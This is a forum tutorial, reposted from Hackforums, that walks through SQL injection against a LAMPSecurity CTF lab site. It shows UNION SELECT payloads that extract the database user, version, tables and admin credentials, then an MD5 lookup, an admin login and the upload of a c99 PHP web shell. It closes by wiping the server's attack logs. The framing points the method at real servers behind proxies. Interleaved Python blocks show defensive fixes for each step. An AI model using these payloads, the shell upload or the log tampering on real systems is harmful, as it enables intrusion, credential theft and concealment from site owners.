Advanced SQLi Tutorial - Complete website r00ting [RE-EDITED by Computer Science]

Advanced SQL Injection Tutorial - Complete website Rooting by Coded32

This work is in proud memory of my haters, the fake social system and some of my best friends.

Note :- This is NOT my work. The credit goes to the people listed below; I only took the opportunity to explore it and share it, and I have been granted permission by the author "Coded32", so cheers.


Credits for the Tutorial and the r00t :-

Coded32
Mantra Security
LAMP Security
C99 shell Creator.
Abhi_M
Limerick
Evil
Srchasst
BrandonMXB
DSG - Dragon Slayer Guy
N3t


Well, before I go through the tutorial, let me introduce myself. I am a complete noob at hacking, but I do hack and have hacked some good sites, and I know the basics; not much, but I can rely on my basics. So before going through this tutorial, what you will need are the following :-


1.) A working brain to understand the concept.
2.) A computer that runs Windows [Linux is better]
3.) Patience


So, before introducing my re-edited edition of what Coded32 and the contributors had already written, I have made it more noob friendly for the members here at Hackforums. I am NOT the original writer of this method and take no responsibility for what you do with it, but I should say this -> always prepare yourself behind 3 proxies before getting your hands dirty on a legal server. The precautions you can take: be sure to use a proxy with SSH and use PuTTY, or Tor, whichever suits you most. I have also added images to make things clearer for beginners. Remember, in hacking and exploring you always have to get your hands dirty and keep exploring, so please be patient till the end of this thread, as it will be a long procedure; if you get distracted by the long method, you fail. So good luck on your fascinating journey of r00ting servers.


- Computer Science.


Note on my THREAD -> It took me a lot of time to design this thread for the convenience of the users here at Hackforums, so please kindly add a reply to the thread to keep it alive, as well as to make me feel that the work I did was fruitful. I would appreciate that. Thanks.


The ORIGINAL content, from Advanced SQLi to r00ting, starts here :)


What you will need are the following :


1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

3. Any PHP shell you are comfortable with.
- Google for "c99 shell". I recommend Devil shell from Team Nuts, Indian Hackers.

The Process.


I have a website for you :)

Code:
http://192.168.132.128/

[Image: mantrahackbar1.jpg]

I went through all the pages of the web site and found a page that takes its input from the URL.

Code:
http://192.168.132.128/?id=13

[Image: mantrahackbar2.jpg]

I launched Hackbar by pressing F9

[Image: mantrahackbar3.jpg]

The power of the single quote. I'm checking whether the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.

Code:
http://192.168.132.128/?id=13'

[Image: mantrahackbar4.jpg]

Since the page content is different from the previous one (the stray quote broke the query), I can be sure that the web page is vulnerable. And maybe you already know how a vulnerable web page looks?
Let's find out the number of tables.
For that we will be using the ORDER+BY command.

Code:
http://192.168.132.128/?id=13 order by 1

[Image: mantrahackbar6.jpg]

I have to keep increasing the last number till I see a change in the page. In usual practice it's going to be a tedious task, since there can be hundreds or thousands of tables, if not more. But with this tool I can simply press the + button till I see a change on the web page.

Code:
http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar7.jpg]

I went up to 7 and there is no change so far.

Code:
http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar12.jpg]

The ORDER+BY injection at 8 changes the page, so I have found a way to hack this web server :P

Code:
http://192.168.132.128/?id=13 order by 8

[Image: mantrahackbar13.jpg]

Now let's go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT.

[Image: mantrahackbar14.jpg]

I provided the number of tables. Since I got a different page at 8, I can be sure that table 8 does not exist and there are only 7 tables.

[Image: mantrahackbar16.jpg]

Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Let's take the number 2.

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7

[Image: mantrahackbar19.jpg]

I replaced the number 2 in the URL with another SQL function; it got executed and the result is displayed on the page. I don't have to explain this if you already know basic SQLi tricks.
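The ORDER BY probing and the UNION SELECT extraction above both work for one reason: whatever follows ?id= is pasted straight into the SQL text. Here is an added Python example (not code from the CTF or from the tutorial) with a constructed SQLite stand-in for the events page, showing the concatenating lookup next to a hardened one that enforces the integer type and binds it as a parameter; the table and column names are assumptions.

```python
import sqlite3

# Constructed stand-in for the CTF's events page: a 7-column table, so the
# injected "order by 7" succeeds and "order by 8" errors, as in the screenshots.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE event(id INTEGER, title TEXT, body TEXT, day TEXT, "
                "image TEXT, author TEXT, status TEXT)")
    con.execute("INSERT INTO event VALUES (13,'Picnic','Bring food','2012-03-10',"
                "'pic.jpg','admin','live')")
    con.execute("CREATE TABLE user(user_username TEXT, user_password TEXT)")
    con.execute("INSERT INTO user VALUES ('admin','constructed-md5-placeholder')")
    return con

def vulnerable_lookup(con, raw_id):
    """The pattern behind ?id=13: the raw parameter becomes part of the SQL text."""
    sql = f"SELECT * FROM event WHERE id={raw_id}"
    try:
        return con.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # This error path is the "different page" the tutorial watches for.
        return f"error: {exc}"

def safe_lookup(con, raw_id):
    """Hardened form: enforce the integer type, then bind it as a parameter."""
    try:
        id_ = int(raw_id)
    except (TypeError, ValueError):
        return []          # a real handler would answer 400 Bad Request
    # The SQL text never changes; the value travels separately as a parameter.
    return con.execute("SELECT * FROM event WHERE id=?", (id_,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for payload in ("13", "13'", "13 order by 7", "13 order by 8",
                    "13 UNION SELECT 1,user_username,3,4,5,6,7 from user"):
        print(repr(payload), "->", vulnerable_lookup(db, payload),
              "| hardened:", safe_lookup(db, payload))
```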

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7

[Image: mantrahackbar21.jpg]

The current user is cms_user@localhost.
Let's find out the version of the database. I replaced 2 in the URL with the version() function.

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7

[Image: mantrahackbar22.jpg]

5.0.45 is the version, so I think this will be an easy target. Google more and research if you get a version below this, like 4.0.x, or any other version. Let me list all the tables.

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

[Image: mantrahackbar23.jpg]

From this list I found that "user" is an interesting table. Now I listed all the columns, and it's a big list.

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

[Image: mantrahackbar24.jpg]

I want the columns from the table "user" and nothing else.

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'


[Image: mantrahackbar25.jpg]

Let's find the user name.

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user

Now, what about the password?

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user

[Image: mantrahackbar26.jpg]

It is hashed, ha ha. Decrypting the password: I copied the MD5 hash, pasted it into Hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com.

[Image: mantrahackbar30.jpg]

Voila!!! I got the password.
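The lookup worked because the CMS stored a bare, unsalted MD5: every user with that password, on every site, has the same hash, so one precomputed table answers all of them. This added Python example (not the tutorial's or the CTF's code) contrasts that with a salted, iterated PBKDF2 record using only the standard library; bcrypt or Argon2 are preferable where a library for them is available.

```python
import hashlib
import hmac
import secrets

ITERATIONS = 600_000   # PBKDF2-HMAC-SHA256 work factor; raise it as hardware improves

def md5_store(password):
    """What this CMS did: one unsalted MD5, identical for every user and every site."""
    return hashlib.md5(password.encode()).hexdigest()

def pbkdf2_store(password, salt=None):
    """Salted, iterated hash in a self-describing record: algo$iters$salt$hash."""
    salt = salt or secrets.token_bytes(16)          # fresh random salt per record
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"

def pbkdf2_verify(password, record):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iters, salt_hex, digest_hex = record.split("$")
        if algo != "pbkdf2_sha256":
            return False
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                     bytes.fromhex(salt_hex), int(iters))
        return hmac.compare_digest(digest.hex(), digest_hex)
    except ValueError:     # malformed record: wrong field count, bad hex, bad int
        return False

if __name__ == "__main__":
    pw = "constructed-sample-password"
    print("md5 twice   :", md5_store(pw) == md5_store(pw))          # True: lookup-able
    print("pbkdf2 twice:", pbkdf2_store(pw) == pbkdf2_store(pw))    # False: salted
    print("verify      :", pbkdf2_verify(pw, pbkdf2_store(pw)))     # True
```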

[Image: mantrahackbar31.jpg]

Finding the login page. It was right in front of me, but in other cases you need to find it. I ain't going to explain everything; you have to do a lot of research, and that is how hackers do it, and how explorers and pirates explore.

[Image: mantrahackbar32.jpg]

Logging in with the credentials I have. Greetings!!! I'm an admin now. Look at my powers. Let me add an event.

[Image: mantrahackbar37.jpg]

And of course I want to upload a picture.

[Image: mantrahackbar38.jpg]

Let's see whether it allows me to upload the shell or not.

[Image: mantrahackbar39.jpg]

Now I'm pressing the "Add Event" button.

[Image: mantrahackbar40.jpg]

Nice. Looks like it got uploaded.

[Image: mantrahackbar41.jpg]

Let's see where the shell got uploaded to.

[Image: mantrahackbar42.jpg]


I'm trying to get the default upload location.

[Image: mantrahackbar43.jpg]
[Image: mantrahackbar44.jpg]

Looks like I got it. Let me click on the c9shell.php file I just uploaded. Voila, I have shell access.
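The upload form accepted a PHP file as an event picture and served it from a directory where the web server executes scripts, which is what turned the admin login into a shell. Added Python example (not the CMS's code) of the checks an upload handler should apply before storing a "picture"; the extension allowlist, magic bytes and sample file contents are constructed for illustration.

```python
import os
import secrets

# Allowed extensions with the magic bytes a genuine file of that type starts with.
IMAGE_MAGIC = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8",
}

def check_upload(client_name, data):
    """Return (True, server_name) if `data` may be stored as an image,
    otherwise (False, reason). The client's file name is never reused."""
    base = os.path.basename(client_name.replace("\\", "/"))   # drop any path part
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension required"      # shell.php.jpg, .htaccess
    ext = parts[1]
    if ext not in IMAGE_MAGIC:
        return False, f"extension .{ext} not allowed"        # c99shell.php
    if not data.startswith(IMAGE_MAGIC[ext]):
        return False, "content does not match claimed type"  # PHP source renamed .jpg
    if b"<?php" in data:
        return False, "embedded PHP tag"                     # image/script polyglot
    # Random server-side name with an allow-listed extension; the directory it is
    # written to should have script execution disabled and sit outside the webroot.
    return True, f"{secrets.token_hex(16)}.{ext}"

if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 32                # constructed JPEG stub
    php = b"<?php /* constructed sample */ ?>"               # constructed script stub
    for name, blob in (("c99shell.php", php), ("shell.php.jpg", php),
                       ("shell.jpg", php), ("pic.jpg", jpeg)):
        print(name, "->", check_upload(name, blob))
```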

[Image: mantrahackbar46.jpg]

I simply clicked on the up button to get to the root folder.

[Image: mantrahackbar48.jpg]

Now I can do whatever I wish: deface the website, maintain access, or whatever. But that's out of the scope of the current tutorial.

What I'm interested in is the log folder.
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks.
Let me go back and edit the log file.

[Image: mantrahackbar52.jpg]
[Image: mantrahackbar53.jpg]

I deleted all the log entries. Now saving it. Nice. The log file is empty now.
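The log.log file recorded every probe above, which is why a copy of such logs belongs on a remote host that the web server's account cannot edit. Added Python example (not the CTF's logging) that scans constructed Apache-format lines for the requests this tutorial made: a non-numeric id parameter, ORDER BY / UNION SELECT / information_schema keywords, and a .php file fetched from the picture directory; the /images/ upload path and the log lines themselves are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

# Constructed Apache combined-format lines mirroring the requests made in this
# tutorial; the /images/ upload path is an assumption, not the CTF's real one.
SAMPLE_LOG = """\
192.168.132.1 - - [10/Mar/2012:10:01:02 +0000] "GET /?id=13 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.132.1 - - [10/Mar/2012:10:01:09 +0000] "GET /?id=13%27 HTTP/1.1" 200 1873 "-" "Mozilla/5.0"
192.168.132.1 - - [10/Mar/2012:10:01:40 +0000] "GET /?id=13+order+by+8 HTTP/1.1" 200 1873 "-" "Mozilla/5.0"
192.168.132.1 - - [10/Mar/2012:10:02:15 +0000] "GET /?id=13+UNION+SELECT+1,table_name,3,4,5,6,7+from+information_schema.tables HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
192.168.132.1 - - [10/Mar/2012:10:05:00 +0000] "GET /images/c99shell.php HTTP/1.1" 200 40210 "-" "Mozilla/5.0"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
KEYWORDS = re.compile(r"(?i)\border\s+by\s+\d+|\bunion\s+select\b|information_schema")
UPLOAD_DIRS = ("/images/",)      # assumption: where the CMS stores event pictures
INT_PARAMS = {"id"}              # parameters the application only ever uses as integers

def classify(path):
    """Reasons a request path matches this page's attack chain, or [] if it is clean."""
    url = urlparse(path)
    reasons = []
    for name, values in parse_qs(url.query).items():   # parse_qs URL-decodes values
        for value in values:
            if name in INT_PARAMS and not value.isdigit():
                reasons.append(f"non-numeric {name}={value!r}")   # catches the lone quote
            if KEYWORDS.search(value):
                reasons.append("SQL keywords in query string")
    if url.path.endswith(".php") and url.path.startswith(UPLOAD_DIRS):
        reasons.append("PHP executed from upload directory")
    return reasons

def scan(log_text):
    """Run classify() over each log line; return the suspicious requests."""
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, when, method, path, status = m.groups()
        reasons = classify(path)
        if reasons:
            hits.append({"ip": ip, "time": when, "status": int(status),
                         "path": unquote_plus(path), "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["path"], hit["reasons"])
```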

[Image: mantrahackbar56.jpg]

Now let's remove the c99 shell by pressing Self Remove. Confirmed!!! OK. Goodbye C99.

[Image: mantrahackbar60.jpg]

Thanks for keeping your patience. Keep the THREAD alive by simply giving a reply; a reply would justify my hard work on this THREAD :)
